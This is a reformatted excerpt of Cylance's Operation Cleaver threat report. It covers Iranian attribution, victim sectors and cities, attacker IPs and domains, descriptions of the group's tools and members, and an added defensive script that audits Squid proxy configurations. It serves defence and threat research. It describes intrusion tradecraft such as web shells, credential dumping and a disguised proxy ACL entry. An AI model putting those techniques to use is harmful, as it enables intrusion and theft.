#%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
#@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
@@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
@@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
&@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
(###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
(%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
#@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
%%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
%%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
#%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
(%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
(((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
(((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
%%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
@@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
@@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
%@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
//#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
/#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((

[ PG-9 ]
  412.  
  413.  
  414.  
  415. [CYLANCE                                                                                  #OPCLEAVER]
  416.  
  417. CRITICAL  DISCOVERIES
  418.  
  419. Iranian Actors Are Behind Operation Cleaver
  420.  
  421. *       Persian hacker names are used throughout the campaign including: Salman Ghazikhani,
  422.         Bahman Mohebbi, Kaj, Parviz, Alireza, and numerous others.
  423. *       Numerous domains used in the campaign were registered in Iran.
  424. *       Infrastructure leveraged in the attack was registered in Iran to the corporate entity
  425.         Tarh Andishan, which translates to “invention” or “innovation” in Farsi.
  426. *       Source netblocks and ASNs are registered to Iran.
  427. *       Hacker tools warn when their external IP address traces back to Iran.
  428. *       The infrastructure is hosted through Netafraz.com, an Iranian provider out of Isfahan, Iran.
  429. *       The infrastructure utilized in the campaign is too significant to be a lone individual or a small
  430.         group. We believe this work was sponsored by Iran.
  431.  
  432.  
  433. Operation Cleaver Targets Critical Infrastructure Around the World
  434.  
  435. *       US Military targets including NMCI in October 2013.5 Confirmed targeting of global government
  436.         entities.
  437. *       Networks and systems targeted in critical industries like energy and utilities, oil and gas,
  438.         and chemical companies.
  439. *       Assets (both cyber and physical) and logistics information were compromised at major airline
  440.         operators, airports, and transportation companies.
  441. *       Various global telecommunications, technology, healthcare, aerospace, and defense companies
  442.         were breached as part of the operation.
  443. *       Confidential critical infrastructure documents were harvested from major educational
  444.         institutions around the world.
  445.  
  446. Iran’s Cyber Hacking Skills Have Evolved
  447.  
  448. *       Initial compromise techniques include SQL injection, web attacks, and creative deception-based
  449.         attacks – all of which have been implemented in the past by Chinese and Russian hacking teams.
  450. *       Pivoting and exploitation techniques leveraged existing public exploits for MS08-067 and Windows
  451.         privilege escalations, and were coupled with automated, worm-like propagation mechanisms.
  452. *       Customized private tools with functions that include ARP poisoning, encryption, credential
  453.         dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB
  454.         communications, network interface sniffing, and keystroke logging.
  455. *       The ability to build customized tools to compromise any target they choose.
  456.  
[ PG-10 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

Indicators of Compromise (IOC)

*       Private signing certificates of one victim were captured, allowing the Operation Cleaver team to
        compromise that victim’s entire organization.
*       Over the past two years, Cylance has collected over 8GB of data including over 80,000 files of
        exfiltrated data, hacker tools, victim logs, and highly sensitive reconnaissance data.
*       Data from sinkholed command and control servers has allowed us to track this active campaign.
*       Cylance is releasing more than 150 IOCs and samples associated with the Cleaver campaign to
        empower the security community to detect existing compromises in their own organizations,
        as well as potentially block future attacks from these teams.

Speculation

*       This campaign continues Iran’s retaliation for Stuxnet, Duqu, and Flame.
*       This is a state-sponsored campaign.
*       There is a possibility that this campaign could affect airline passenger safety.
*       This campaign’s intentions may be to damage Industrial Control Systems (ICS), Supervisory Control
        and Data Acquisition (SCADA) systems, and impact Critical Infrastructure and Key Resources (CIKR).
*       This campaign could be a way to demonstrate Iran’s cyber capabilities for additional geopolitical
        leverage, due to the breadth and depth of their global targets.
*       There is an intense focus on CIKR companies in South Korea, which could give Iran additional clout
        in their burgeoning partnership with North Korea. In September 2012, Iran signed an extensive
        technology cooperation agreement with North Korea, which would allow for collaboration on
        various efforts including IT and security [6].
*       Iran is recruiting from within the universities and potentially using ‘hackers for hire’ [7].

[ PG-11 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

[ASCII ART: "TARGETS & VICTIMS" section cover art from the original report]

[ PG-12 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

TARGETS & VICTIMS

The Cleaver team targets some of the most sensitive critical infrastructure companies in the
world, including military, oil and gas, airlines, airports, energy producers, utilities,
transportation, healthcare, telecommunications, technology, manufacturing, education, aerospace,
Defense Industrial Base (DIB), chemical companies and governments. Countries impacted include
Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar,
Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the US.

The following is a breakdown by country of which industries were targeted and/or victimized:

Canada: Energy & Utilities, Oil & Gas, Hospitals
China: Aerospace
England: Education
France: Oil & Gas
Germany: Telecommunications
India: Education
Israel: Aerospace, Education
Kuwait: Oil & Gas, Telecommunications
Mexico: Oil & Gas
Pakistan: Airports, Hospitals, Technology, Airlines
Qatar: Oil & Gas, Government, Airlines
Saudi Arabia: Oil & Gas, Airports
South Korea: Airports, Airlines, Education, Technology, Heavy Manufacturing
Turkey: Oil & Gas
United Arab Emirates: Government, Airlines
United States: Airlines, Education, Chemicals, Transportation, Energy & Utilities, Military/Government,
               Defense Industrial Base

[ PG-13 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

Cleaver’s level of access into each organization varied greatly, including completely compromised
systems and networks, Active Directory domain controllers and credentials, compromised data
repositories and stolen VPN credentials.

Compromised systems include Microsoft Windows web servers running IIS and ColdFusion, Apache with PHP,
many variants of Microsoft Windows desktops and servers, and Linux servers. Compromised network
infrastructure included Cisco VPNs as well as Cisco switches and routers. Unlike Stuxnet, no exotic
exploits (such as 0-days) were observed.

Within our investigation, we had no direct evidence of a successful compromise of specific Industrial
Control Systems (ICS) or Supervisory Control and Data Acquisition (SCADA) networks, but Cleaver did
exfiltrate extremely sensitive data from many critical infrastructure companies, data that would allow
the attackers to directly affect the systems those companies run. This data could enable them, or
affiliated organizations, to target and potentially sabotage ICS and SCADA environments with ease.

We discovered over 50 victims in our investigation, distributed around the globe. Ten of these victims
are headquartered in the US and include a major airline, a medical university, an energy company
specializing in natural gas production, an automobile manufacturer, a large defense contractor, and a
major military installation. The four targets in Israel and the five targets in Pakistan span
education, aerospace, airports, airlines, healthcare and technology. Further victims were identified
in numerous Middle Eastern countries as well as in Northern Europe, including the UK, France, and
Germany. Central America was not immune either, with a large oil and gas company on the list. In fact,
oil and gas was a particular focal point for the Cleaver team, which went after no fewer than nine such
companies around the world.

Universities were targeted in the US, India, Israel, and South Korea. The attackers targeted research
efforts, student information, student housing, and financial aid systems. They had a penchant for
pictures, passports, and any specific identifying information.

Perhaps the most bone-chilling evidence we collected in this campaign was the targeting and compromise
of transportation networks and systems such as airlines and airports in South Korea, Saudi Arabia and
Pakistan. The level of access seemed ubiquitous: Active Directory domains were fully compromised,
along with entire Cisco edge switches, routers, and internal networking infrastructure. Fully
compromised VPN credentials meant their entire remote access infrastructure and supply chain was under
the control of the Cleaver team, allowing permanent persistence under compromised credentials.
They achieved complete access to airport gates and their security control systems, potentially
allowing them to spoof gate credentials. They gained access to PayPal and Go Daddy credentials, allowing
them to make fraudulent purchases and giving them unfettered access to the victim’s domains. We
witnessed a shocking amount of access into the deepest parts of these companies and the airports in
which they operate.

[ PG-14 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

TARGET LOCATIONS

1. Canada - Calgary
2. Canada - Hamilton
3. China - Beijing
4. England - Oxford
5. France - Paris
6. Germany - Dusseldorf
7. Germany - Frankfurt
8. India - New Delhi (2)
9. Israel - Haifa (3)
10. Israel - Rehovot
11. Kuwait - Ahmadi
12. Kuwait - Kuwait City
13. Mexico - Mexico City
14. Pakistan - Karachi (2)
15. Pakistan - Lahore
16. Pakistan - Multan
17. Pakistan - Peshawar
18. Qatar - Doha (4)
19. Saudi Arabia - Dhahran
20. Saudi Arabia - Jeddah
21. South Korea - Incheon
22. South Korea - Goyang-si
23. South Korea - Seoul (7)
24. Turkey - Antalya
25. UAE - Abu Dhabi
26. UAE - Al Garhoud
27. USA - California - Los Angeles (2)
28. USA - California - San Diego
29. USA - California - San Jose
30. USA - Michigan - Dearborn
31. USA - Texas - Houston (2)
32. USA - Texas - Fort Worth
33. USA - Texas - Southlake
34. USA - Virginia - Fairfax
35. USA - Virginia - McLean

[ PG-15 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

[PRETTY CHART]

Figure 2: Geographic distribution of victims, as determined by the global headquarters of the parent
company or organization breached.

[ PG-16 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

[ASCII ART: "ATTRIBUTION" section cover art from the original report]

[ PG-17 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]

ATTRIBUTION

Despite today’s trend toward attacker attribution, we believe it offers little real benefit to the
day-to-day cyber defender. However, in this report we offer our observations on the sources of
Operation Cleaver in order to benefit those that rely on attribution, such as law enforcement.

Operation Cleaver is believed to consist of at least 20 hackers and developers, collaborating on
projects and missions to support Iranian interests. Many of the targets were predominantly
English-speaking and a majority of the team members were capable of reading and writing in English.
We present evidence that this team is operating, at least in part, out of Iran and in the interests
of Iran. The skills and behavior of the Operation Cleaver teams are consistent with, and in one case
surpass, Iran’s cyber capabilities as we know them today.

For a complete list of IPs and domains related to this campaign, please refer to the Indicators of
Compromise section.

Figure 4: The logo of the Army of the Guardians of the Islamic Revolution, also known as the Islamic
Revolutionary Guard Corps (IRGC).

ATTACKER IP ADDRESSES

Over the course of multiple incident response engagements related to Operation Cleaver, we were able
to identify a small set of IP addresses which were commonly used during the initial stages of an attack.

The IP address 78.109.194.114 served as a source for one of the primary attackers. They were
observed conducting SQL injections, controlling backdoors, and exfiltrating information using
this address, and the address appears in multiple software configurations recovered from staging
servers over a period of time.

GeoIP Location: Iran
Net block: 78.109.194.96 - 78.109.194.127
Owner: Tarh Andishan
Email: tarh.andishan(at)yahoo.com
Phone: +98-21-22496658
NIC-Handle: TAR1973-RIPE

  792. [ PG-18 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  793.  
  794.  
  795.  
  796. [CYLANCE                                                                                  #OPCLEAVER]
  797.  
  798.  
  799. This IP address was also observed in multiple software configurations. This particular net block was
  800. used over an extended period of time, indicating these were under the Cleaver team’s physical control.
  801. Additionally, prior netblocks used by the same team demonstrated to us that this wasn’t simply a
  802. case of proxying or “island hopping”. For more information see the Tarh Andishan section of this report.
  803.  
  804. The IP address 159.253.144.209 was a source for a secondary attacker in various compromises. They
  805. were observed conducting SQL injection attacks. While this IP was this registered in the Netherlands,
  806. we believe they used Softlayer’s Citrix demo environment to launch these attacks which is consistent
  807. with proxying or “island hopping”.
  808.  
  809. GeoIP Location: Netherlands
  810. Net block: 159.253.144.208 - 159.253.144.223
  811. ASN: Softlayer Technologies, Inc.
  812. IP Location: Netherlands, Amsterdam with Iranian sourcing.
  813.  
  814. ATTACKER DOMAINS
  815.  
  816. A number of Cleaver’s attack methods require a persistent server. In many cases, these servers were
  817. referenced by domain names. The following malicious domains are operated by this organization and are
  818. grouped by the registrant’s email address.
  819.  
  820. davejsmith200(at)outlook.com
  821. *       Teledyne-Jobs.com
  822. *       DownloadsServers.com
  823. *       NorthropGrumman.net
  824. *       MicrosoftMiddleAst.com
  825.  
  826. azlinux73(at)gmail.com
  827. *       MicrosoftServerUpdate.com
  828. *       WindowsSecurityUpdate.com
  829. *       WindowsServerUpdate.com
  830.  
  831. domain(at)netafraz.com
  832. *       EasyResumeCreatorPro.com
  833. *       MicrosoftWindowsResources.com
  834.  
  835. salman.ghazikhani(at)outlook.com
  836. *       Doosan-Job.com
  837.  
  838. btr.8624(at)yahoo.com
  839. *       GoogleProductUpdate.net
  840. *       WindowsCentralUpdate.com
  841. *       WindowsUpdateServer.com
  842. *       DriverCenterUpdate.com
  843.  
  844. msnhst(at)microsoft.com
  845. *       MicrosoftWindowsUpdate.net
  846.  
  847.  
  848. As is typical with malicious domains, the Whois data for most of these domains contained falsified
  849. information.
  850.  
  851. We managed to obtain a large collection of the internally developed tools used by the Cleaver team,
  852. many of which were developed by its members. Due to operational security failures, these tools
  853. contain information that provided us insight into their organization and operations.
  854.  
  855. [ PG-19 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  856.  
  861. TOOLS & SOFTWARE
  862.  
  863. Shell Creator 2
  864.  
  865. In the tool named Shell Creator 2, there are three main components. The creator generates an ASPX web
  866. shell using user input as well as a collection of templates. The web shell could then be installed
  867. via xp_cmdshell, or any other method which would grant the attacker write access. The web shell is
  868. accessible by the shell client directly.
  869.  
  870. The shell client is a portion of Shell Creator 2 that was not designed to be run on a compromised
  871. computer. We originally located it on a staging server being utilized for multiple attacks as well
  872. as a tool for sharing data between members of the organization’s team.
  873.  
  874. The shell client, which is developed in Java and is easily decompiled, is a simple interface with a
  875. feature to protect the operator from making a critical mistake. When executed, and before any
  876. connection to an instance of the web shell is initiated, the shell client communicates with
  877. freegeoip.net in order to get the external IP address of the current user. The country of origin is
  878. then shown to the user, to inform them of what country it appears they are connecting from. The
  879. assumed purpose of this feature is to ensure that a proper proxy is in use, and the real origin of
  880. the attacker is not revealed.
  881.  
  882. After decompiling the shell client, we found the following code segment controlling the display of
  883. this IP location information.
  884.  
  885. [EWWW SCREENCAP!]
  886. Figure 5: Java source code showing how Shell Creator 2 distinguishes between a source IP address
  887. coming from Iran (red) versus any other country (green).
  888.  
  889. This code handles the XML response from freegeoip.net, and displays the information as different
  890. colors based on different attributes. For instance, if the string “ERROR” is in the
  891. response, the text is displayed with the color magenta. If the string IRAN is in the response, the
  892. text is displayed with the color red. It should be noted that no other country name contains the
  893. substring IRAN.
  894.  
  895. [ PG-20 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  896.  
  902. Shell Creator 2 (cont.)
  903.  
  904. [EWWW SCREENCAP!]
  905. Figure 6: Shell Creator 2 alerts the user in red when the IP being used can be sourced to Iran.
  906.  
  907. [EWWW SCREENCAP!]
  908. Figure 7: Shell Creator 2 notifies the user in green when their source IP address is not Iran.
  909.  
  910.  
  911. Net Crawler
  912.  
  913. Net Crawler is a tool developed in C# that exhibits worm-like behavior in order to gather cached
  914. credentials from any and all accessible computers on an infected network. This is done with Windows
  915. Credential Editor (WCE) and Mimikatz in combination with PsExec. Different versions of this malware
  916. contain ASCII art which names the authoring group as Zhoupin (in “leetspeak” as “Zh0up!n”).
  917.  
  918. ________   __         __                   __            
  919. /\_____  \ /\ \      /'__`\                /\ \            
  920. \/____//'/'\ \ \___ /\ \/\ \  __  __  _____\ \ \    ___    
  921.      //'/'  \ \  _ `\ \ \ \ \/\ \/\ \/\ '__`\ \ \ /' _ `\  
  922.     //'/'___ \ \ \ \ \ \ \_\ \ \ \_\ \ \ \L\ \ \_\/\ \/\ \
  923.     /\_______\\ \_\ \_\ \____/\ \____/\ \ ,__/\/\_\ \_\ \_\
  924.     \/_______/ \/_/\/_/\/___/  \/___/  \ \ \/  \/_/\/_/\/_/
  925.                                         \ \_\              
  926.                                          \/_/              
  927.  
  928.             Net_Crawler verion 1.0  (;) !
  929.                        
  930. Figure 8: Net Crawler version 1.0 has ASCII art showing the use of “Zh0up!n” in the campaigns tools.
  931.  
  932.  ________   __         __    
  933. /\_____  \ /\ \      /'__`\  
  934. \/____//'/'\ \ \___ /\ \/\ \  
  935.      //'/'  \ \  _ `\ \ \ \ \
  936.     //'/'___ \ \ \ \ \ \ \_\ \
  937.     /\_______\\ \_\ \_\ \____/
  938.     \/_______/ \/_/\/_/\/___/
  939.                              
  940.             Net_CR verion 2.8  (;) !
  941.  
  942. Figure 9: Updated ASCII art found in Net Crawler tool shows a version of “Zh0up!n” shortened to simply “Zh0”.
  943.  
  944.  
  945. For more information on Net Crawler, see the Tactics, Techniques and Procedures section.
  946.  
  947.  
  948. [ PG-21 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  949.  
  954. TinyZBot
  955.  
  956. TinyZBot is a bot written in C# and developed by the Cleaver team. It is the longest developed malware
  957. family discovered by this group, and has been used in campaigns for close to two years. How it operates
  958. can vary greatly from version to version. For a detailed technical analysis of TinyZBot, see the
  959. Tactics, Techniques and Procedures section. As TinyZBot is developed in C#, many versions can be
  960. decompiled to code very similar to their originals, including names of namespaces. Many versions
  961. were obfuscated with a legitimate tool for developers named SmartAssembly, which makes the recovery
  962. of some names implausible.
  963.  
  964. We obtained multiple versions from which we were able to recover many of the original names of
  965. variables and namespaces. In a number of these samples, the primary namespace for TinyZBot  
  966. is named Zhoupin_Cleaver. In every version of TinyZBot that is not obfuscated, there is a code base
  967. referred to as Cleaver. This code base is also shared in other malware developed by this organization,
  968. such as Csext.
  969.  
  970. PrivEsc
  971.  
  972. PrivEsc is a blatant plagiarism of an existing exploit for Microsoft Windows released in January 2010
  973. called MS10-015, “Vulnerabilities in Windows Kernel Could Allow Escalation of Privilege”, popularly
  974. known as the KiTrap0D exploit which was released publicly. The Cleaver team clearly modified the
  975. source code and compiled a new version. The only detectable modification was to change the original
  976. author’s name to instead display the following:
  977.  
  978.           Zhopin Exploit Team
  979.  
  980. This is not the only case of this team relabeling others’ work as their own.
  981.  
  982. Logger Module
  983.  
  984. Logger module is a component of the PVZ (PVZ is shorthand for Parviz, one of the members of the
  985. Cleaver team) bot tool chain. When executed, it will capture the user’s keystrokes and save them
  986. to a location which PVZ bot then exfiltrates. The logger module binary’s file description value is
  987. the following:
  988.  
  989.           ye file khube DG. ba in ham kari nadashte bashin
  990.  
  991. Roughly translated from Persian, this text says:
  992.  
  993.           DG is a good file, don’t bother with this
  994.  
  995. [ PG-22 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  996.  
  1001. Logger Module (cont.)
  1002.  
  1003. This text could potentially be a note intended to stay internal, or could be an attempt to persuade
  1004. an unsuspecting victim to assume the file is not malicious. The Product Name value is GOOD FILE.
  1005. For more information on the PVZ bot tool chain, see the Tactics, Techniques, and Procedures section.
  1006.  
  1007. CCProxy
  1008.  
  1009. CCProxy is a publicly available proxy server for Windows, which can handle a variety of protocols. We
  1010. do not believe that this organization was involved in the development or modification of CCProxy, but
  1011. they have been observed using it. We recovered a CCProxy configuration, which exposed various
  1012. operational details.
  1013.  
  1014. The configuration allowed remote connections, restricted to a single username and a limited IP range.
  1015. The username was User-001, which is the default value. The limited IP range covered one IP: 78.109.194.114.
  1016.  
  1017. This IP address is located in Iran, and is owned by Tarh Andishan.
  1018.  
  1019. The configuration also indicates which address the CCProxy server should listen on for incoming
  1020. connections such as web (80) and mail (25).
  1021.  
  1022. [EWWW SCREENCAP!]
  1023.  
  1024. Figure 10 (above): CCProxy configuration file using the hardcoded IP address registered to Tarh Andishan.
  1025. [EWWW SCREENCAP!]
  1026.  
  1027. Figure 11 (left): CCProxy configuration file showing the use of web and mail as listening ports.
  1028.  
  1029. [ PG-23 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1030.  
  1035. NMAP Log
  1036.  
  1037. Log output from the network port scanning application NMAP was recovered from a staging server. This
  1038. log was generated during the usage of the nbrute utility, which brute-forces network credentials and
  1039. relies on NMAP to do so. The header of this NMAP log indicates that the computer used to run
  1040. nbrute/nmap was set to Iran Daylight Time at the time of execution.
  1041.  
  1042.  
  1043.                 Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time
  1044.  
  1045. With no known victims located in Iran, it is likely that this was executed on an attacker’s computer,
  1046. and not on a victim’s computer.
  1047.  
  1048. Squid Configuration
  1049.  
  1050. A configuration file for a Squid proxy server was recovered.
  1051.  
  1052. [EWWW SCREENCAP!]
  1053.  
  1054. Figure 12: Squid configuration file showing the use of Tarh Andishan’s IP address.
  1055.  
  1056.  
  1057. The net range of 78.109.194.114/28 was inserted into the allowed local networks with an RFC comment
  1058. appended in order to make it look like it was part of the default configuration. It is likely that a
  1059. /28 net range was used for the same reason: so that the entry would not look like it was intended to
  1060. allow only one IP. This gives this Iranian IP address the same access to resources reachable from the
  1061. Squid proxy server.
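As an added example (not from the report), the check a defender would run over a recovered or deployed Squid configuration: flag any `localnet` source range outside private or link-local space, and note when the written prefix has host bits set, as a /28 wrapped around a single address does. The sample configuration is constructed after Squid's default file; the 78.109.194.114/28 entry is the range discussed above, and the function names are mine.

```python
import ipaddress
import re

# Ranges that legitimately appear in the "localnet" ACL of Squid's default
# configuration (private and link-local space).  Any other range allowed as
# "localnet" deserves a closer look, whatever its trailing comment claims.
EXPECTED_LOCAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "169.254.0.0/16",                                   # RFC 3927 link-local
    "fc00::/7", "fe80::/10",                            # RFC 4193 / RFC 4291
)]

# "acl <name> src <net> [<net> ...] [# comment]"; one or more networks per line
ACL_SRC = re.compile(r"^\s*acl\s+(\S+)\s+src\s+([^#]*?)\s*(?:#\s*(.*))?$")


def is_expected_local(net):
    """True when the network sits inside one of the expected local ranges."""
    return any(net.subnet_of(exp) for exp in EXPECTED_LOCAL
               if exp.version == net.version)


def audit_localnet(conf_text):
    """Return one finding per 'localnet' source range that is not private or
    link-local.  Each finding records the config line, the normalised network,
    whether the prefix as written had host bits set (a /28 written against a
    single address), and the comment attached to the line."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), start=1):
        m = ACL_SRC.match(line)
        if not m or m.group(1) != "localnet":
            continue
        comment = m.group(3) or ""
        for src in m.group(2).split():
            try:
                iface = ipaddress.ip_interface(src)
            except ValueError:
                findings.append({"line": lineno, "network": src,
                                 "host_bits_set": False, "comment": comment,
                                 "reason": "unparseable source"})
                continue
            net = iface.network            # host bits masked off
            if is_expected_local(net):
                continue
            findings.append({
                "line": lineno,
                "network": str(net),
                "host_bits_set": iface.ip != net.network_address,
                "comment": comment,
                "reason": "public range allowed as localnet",
            })
    return findings


# Constructed sample modelled on Squid's default squid.conf; the fifth line is
# the kind of insertion described above, dressed up with a default-looking comment.
SAMPLE_CONF = """\
# TAG: acl
acl localnet src 10.0.0.0/8        # RFC1918 possible internal network
acl localnet src 172.16.0.0/12     # RFC1918 possible internal network
acl localnet src 192.168.0.0/16    # RFC1918 possible internal network
acl localnet src 78.109.194.114/28 # RFC1918 possible internal network
acl localnet src fc00::/7          # RFC 4193 local private network range
acl SSL_ports port 443
http_access allow localnet
"""

if __name__ == "__main__":
    for f in audit_localnet(SAMPLE_CONF):
        print(f"line {f['line']}: {f['network']} ({f['reason']}; "
              f"host bits set: {f['host_bits_set']}; comment: {f['comment']!r})")
```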
  1062.  
  1063.  
  1064. TARH ANDISHAN
  1065.  
  1066. Tarh Andishan is listed as the registrant for a number of small net blocks based upon the email address
  1067. tarh.andishan(at)yahoo.com. The net blocks appear to rotate over time and registrant information is
  1068. altered to accommodate ongoing operations and avoid potential public exposure.
  1069.  
  1070. [ PG-24 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1071.  
  1077. TARH ANDISHAN (cont.)
  1078.  
  1079. The networks are included below as well as the last time that net block was observed as active.
  1080.  
  1081.  
  1082. * 78.109.194.96/27 - Current
  1083. * 217.11.17.96/28 - 10/22/2014
  1084. * 81.90.144.104/29 - 10/5/2014
  1085. * 31.47.35.0/24 - 11/2012
  1086.  
  1087. There are many seemingly legitimate Tarh Andishan related companies inside Tehran, but strong connections
  1088. to Iranian backing have been difficult to prove definitively. “Tarh Andishan” is often translated as
  1089. “Thinkers”, “Innovators” and “Inventors”.
  1090.  
  1091. The net blocks above have strong associations with state-owned oil and gas companies. These companies
  1092. have current and former employees who are ICS experts.
  1093.  
  1094. Tarh Andishan has been suspected in the past of launching attacks in the interest of Iran. The
  1095. operators of the blog IranRedLine.org, which comments on Iran’s nuclear weapons efforts, have mentioned
  1096. in multiple posts having been the target of debilitating brute-force authentication attacks from IP
  1097. addresses registered to the same Tarh Andishan team found in Cleaver.
  1098.  
  1099. In one of IranRedLine.org’s blog posts [8], the author speculates on Tarh Andishan’s involvement with the
  1100. Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and
  1101. Research; however, the phone number listed under the registrant contact information has yet to be
  1102. completely validated.
  1103.  
  1104.  
  1105. [EWWW SCREENCAP!]
  1106.  
  1107. Figure 13: This image from IranRedLine.org shows the proximity of Tarh Andishan’s probably fabricated
  1108. Whois address to Iran’s SPND (Organization of Defensive Innovation and Research).
  1109.  
  1110.  
  1111. [ PG-25 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1112.  
  1117. MEMBERS
  1118.  
  1119. During this investigation, we were able to compile a considerable amount of information on some of
  1120. the members of this organization. The following profiles were built from reverse engineering, code
  1121. analysis, open source intelligence, incident response and forensics work. Personally identifiable
  1122. information about these members is not being shared publicly as it could endanger their lives and
  1123. would be irresponsible.
  1124.  
  1125. Parviz
  1126.  
  1127. Parviz is a developer who worked on a variety of projects, and was primarily active in 2013. His
  1128. development skillset is based around his ability to develop in C/C++. He has been observed using
  1129. Visual Studio 2010, and his tools are written exclusively for Windows. Some of his tools were found
  1130. to be packed with ASPack.
  1131.  
  1132. Parviz is the primary developer of the PVZ bot and multiple parts of its tool chain. Parviz is likely
  1133. associated with the PVZ bot as his name is hardcoded into the PDB file paths.
  1134.  
  1135. The PVZ tool chain includes a variety of functionality, such as HTTP command and control
  1136. communications with an ASPX server-side component, a denial of service tool they developed, and the
  1137. public project named XYNTService used to run ordinary applications as services.
  1138.  
  1139. PDBs
  1140.  
  1141. * C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\Release\BotManager.pdb
  1142. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\Release\socket-test.pdb
  1143. * C:\Users\parviz\Documents\Visual Studio 2010\Projects\XYNTServiceProject\XYNTServiceProject\Debug\XYNTService.pdb
  1145. * C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\Release\SendModule.pdb
  1146.  
  1147.  
  1148. [ PG-26 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1149.  
  1154. Nesha
  1155.  
  1156. Nesha is one of the offensive members of this organization. Nesha was seen in breaches involving SQL
  1157. injection as well as other techniques. Nesha often utilized web-based backdoors developed in ASPX,
  1158. PHP as well as ColdFusion. A copy of an MS08-067 exploit developed in Python was recovered in which
